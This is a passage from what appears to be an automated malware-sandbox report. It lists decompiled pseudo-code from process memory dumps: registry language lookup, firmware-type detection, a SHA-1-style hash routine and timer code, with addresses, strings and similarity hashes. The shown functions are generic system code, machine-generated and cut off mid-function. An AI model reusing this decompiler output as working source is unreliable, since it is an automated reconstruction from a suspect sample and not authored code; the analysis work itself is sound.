										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x019ee620
0x019ee628
0x019ee62f
0x019ee631
0x019ee635
0x019ee637
0x019ee63e
0x01a45503
0x01a45503
0x019ee64c
0x019ee64c
0x019ee651
0x00000000
0x00000000
0x019ee661
0x019ee665
0x01a4542a
0x019ee715
0x019ee71a
0x019ee71c
0x019ee720
0x019ee720
0x019ee727
0x019ee736
0x019ee736
0x019ee743
0x019ee743
0x019ee673
0x019ee678
0x019ee67d
0x019ee682
0x019ee685
0x019ee692
0x019ee69b
0x019ee6a3
0x019ee6ad
0x019ee6b1
0x019ee6b2
0x019ee6bb
0x019ee6bf
0x019ee6c0
0x019ee6c8
0x019ee6cc
0x019ee6d5
0x019ee6d9
0x00000000
0x00000000
0x019ee6e5
0x019ee6ea
0x019ee6f9
0x019ee70b
0x019ee70f
0x01a45439
0x01a4545e
0x01a4545e
0x00000000
0x01a4545e
0x01a4543b
0x01a4543e
0x01a45440
0x01a45445
0x01a45472
0x01a45475
0x01a4548d
0x01a45493
0x01a454a9
0x00000000
0x00000000
0x01a454ab
0x01a454b4
0x01a454bc
0x01a454c8
0x01a454de
0x01a454fb
0x01a454e0
0x01a454e6
0x01a454eb
0x01a454eb
0x01a454de
0x00000000
0x01a454bc
0x01a45477
0x01a4547a
0x01a45480
0x01a45483
0x01a45486
0x01a4548b
0x00000000
0x00000000
0x00000000
0x01a4548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01a45447
0x01a45447
0x01a45447
0x01a45447
0x01a4544e
0x00000000
0x00000000
0x01a45450
0x01a45452
0x01a45455
0x01a4545a
0x00000000
0x00000000
0x00000000
0x01a4545c
0x01a4546a
0x01a4546d
0x01a4546f
0x00000000
0x01a4546f
0x019ee70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 019EE68C
InstallLanguageFallback, xrefs: 019EE6DB
@, xrefs: 019EE6C0

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 613a0f95f0e6067ab22ed4245a11ec355326cc75bc1796ec83be3a84a7526e9c
Instruction ID: 65edc1d01cf23023a4289e0448b05b7224c8ed4e7b2d8dfb28bb4a1009e325d2
Opcode Fuzzy Hash: 613a0f95f0e6067ab22ed4245a11ec355326cc75bc1796ec83be3a84a7526e9c
Instruction Fuzzy Hash: 3D51D376A043169BD715DF68C444A6BB7E9BF88714F04092EFA89D7241F734DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01A651BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01A651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1ac05f0);
				E01A3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E019FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E01A653CA(0);
						return E01A3D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E01A2F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01A03690(1, _t117, 0x19c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E01A2AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01A04620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E01A2AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E01A6500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01A29860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x01a651be
0x01a651c3
0x01a651c8
0x01a651cd
0x01a651d0
0x01a651d3
0x01a651d8
0x01a651db
0x01a651de
0x01a651e0
0x01a651e3
0x01a651e6
0x01a651e8
0x01a65342
0x01a65351
0x01a65356
0x01a6535a
0x01a65360
0x01a65363
0x01a65366
0x01a65369
0x01a65369
0x01a6536b
0x01a6536b
0x01a65370
0x01a653a3
0x01a653a4
0x01a653a6
0x01a653ab
0x01a653ab
0x01a653ae
0x01a653ae
0x01a653b5
0x01a653bf
0x01a653bf
0x01a65375
0x01a65396
0x01a653a0
0x01a653a0
0x00000000
0x01a65396
0x01a65377
0x01a65379
0x01a6537f
0x01a6538c
0x01a65390
0x00000000
0x01a65390
0x01a651ee
0x01a651f1
0x01a65301
0x01a65310
0x01a65315
0x01a65318
0x01a6531b
0x01a65320
0x01a6532e
0x01a65331
0x00000000
0x01a65331
0x01a65328
0x01a65329
0x00000000
0x01a65329
0x01a651fa
0x01a65235
0x01a65236
0x01a65239
0x01a6523f
0x01a65240
0x01a65241
0x01a65242
0x01a65246
0x01a65247
0x01a6524e
0x01a65251
0x01a65267
0x01a65269
0x01a6526e
0x01a6527d
0x01a6527e
0x01a65281
0x01a65282
0x01a65287
0x01a65288
0x01a6528a
0x01a6528f
0x01a65294
0x00000000
0x00000000
0x01a6529a
0x01a6529c
0x01a6529e
0x01a6529e
0x01a652a4
0x01a652b0
0x00000000
0x00000000
0x01a652ba
0x01a652bc
0x01a652bc
0x01a652d4
0x01a652d9
0x01a652dc
0x01a652e1
0x00000000
0x00000000
0x01a652e7
0x01a652f4
0x00000000
0x01a652f4
0x01a65270
0x00000000
0x01a65270
0x01a651fc
0x01a651fd
0x01a65202
0x01a65203
0x01a65205
0x01a6520a
0x01a6520f
0x00000000
0x00000000
0x01a6521b
0x01a65226
0x01a6522b
0x01a6521d
0x01a6521d
0x01a65222
0x01a65222
0x01a6522d
0x00000000

Strings

Legacy, xrefs: 01A65226
UEFI, xrefs: 01A6521D

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 4dda30887a5779eccb5332cd128ac2e51aa9d051fad633344a134490ebd58da8
Instruction ID: fa72385da2231a9bc47991d86a51a69bd1cfdf0b610a97dc45cbae80d6018598
Opcode Fuzzy Hash: 4dda30887a5779eccb5332cd128ac2e51aa9d051fad633344a134490ebd58da8
Instruction Fuzzy Hash: F65159B1E007199FDB25DFA9C990AAEBBF8FF48B80F14402DE659EB251D671D900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00408C60, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00408C60(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00408c6b
0x00408c6f
0x00408c71
0x00408c71
0x00408c74
0x00408c96
0x00408cbc
0x00408ce2
0x00408d04
0x00408d0b
0x00408d0e
0x00408d11
0x00408d1a
0x00408d20
0x00408d27
0x00408d38
0x00408d3b
0x00408d3e
0x00408d42
0x00408d44
0x00408d46
0x00408d4f
0x00408d52
0x00408d55
0x00408d60
0x00408d66
0x00408d68
0x00408d68
0x00408d6b
0x00408d6e
0x00408d6e
0x00408d73
0x00408d75
0x00408d78
0x00408d7b
0x00408d81
0x00408d84
0x00408d87
0x00408d90
0x00408d96
0x00408d9f
0x00408dae
0x00408db5
0x00408db8
0x00408dbb
0x00408dc4
0x00408dc7
0x00408dca
0x00408de2
0x00408de9
0x00408deb
0x00408dee
0x00408df1
0x00408dfa
0x00408e01
0x00408e04
0x00408e07
0x00408e16
0x00408e1d
0x00408e20
0x00408e23
0x00408e2c
0x00408e36
0x00408e39
0x00408e45
0x00408e48
0x00408e4f
0x00408e52
0x00408e55
0x00408e5a
0x00408e5d
0x00408e66
0x00408e77
0x00408e7a
0x00408e7d
0x00408e84
0x00408e87
0x00408e8a
0x00408e8d
0x00408e8f
0x00408e92
0x00408e95
0x00408e9e
0x00408ea3
0x00408ea3
0x00408eb8
0x00408ebb
0x00408ebe
0x00408ec5
0x00408ec8
0x00408ecb
0x00408ee0
0x00408ee7
0x00408eea
0x00408eee
0x00408ef1
0x00408ef6
0x00408ef9
0x00408f08
0x00408f0b
0x00408f12
0x00408f15
0x00408f18
0x00408f1b
0x00408f1e
0x00408f26
0x00408f34
0x00408f37
0x00408f3a
0x00408f3a
0x00408f41
0x00408f44
0x00408f47
0x00408f4f
0x00408f5d
0x00408f60
0x00408f67
0x00408f6a
0x00408f6d
0x00408f70
0x00408f73
0x00408f7c
0x00408f83
0x00408f83
0x00408f89
0x00408fa2
0x00408fa5
0x00408fac
0x00408faf
0x00408fb2
0x00408fc4
0x00408fce
0x00408fd1
0x00408fda
0x00408fdd
0x00408fe4
0x00408fe7
0x00408fed
0x00409000
0x00409007
0x0040900a
0x0040900d
0x00409010
0x00409019
0x0040901c
0x0040902f
0x00409032
0x0040903c
0x0040903f
0x00409041
0x0040904a
0x0040904d
0x00409060
0x00409066
0x00409069
0x00409070
0x00409072
0x00409075
0x00409078
0x0040907b
0x0040907e
0x00409081
0x0040908a
0x0040908f
0x00409092
0x00409092
0x004090a5
0x004090a8
0x004090ab
0x004090b2
0x004090b5
0x004090b8
0x004090bb
0x004090ce
0x004090d1
0x004090dc
0x004090df
0x004090eb
0x004090ee
0x004090f4
0x004090f7
0x004090fa
0x00409101
0x00409111
0x00409114
0x0040911a
0x0040911d
0x00409124
0x00409126
0x00409129
0x0040912c
0x0040912f
0x00409132
0x00409139
0x00409148
0x0040914b
0x00409152
0x00409155
0x00409158
0x0040915b
0x0040915e
0x00409161
0x00409164
0x0040916d
0x0040917e
0x00409186
0x0040918c
0x0040918f
0x00409191
0x00409194
0x00409197
0x004091a4

Strings

(, xrefs: 00408F7C

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 01A0B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01A0B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1add360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01A07D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01AB8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01A29E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E01A2B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E01A2CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01A07D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01AB8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E01A2AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1ad8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1ad862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1ad8628; // 0x0
							_t116 =  *0x1ad862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
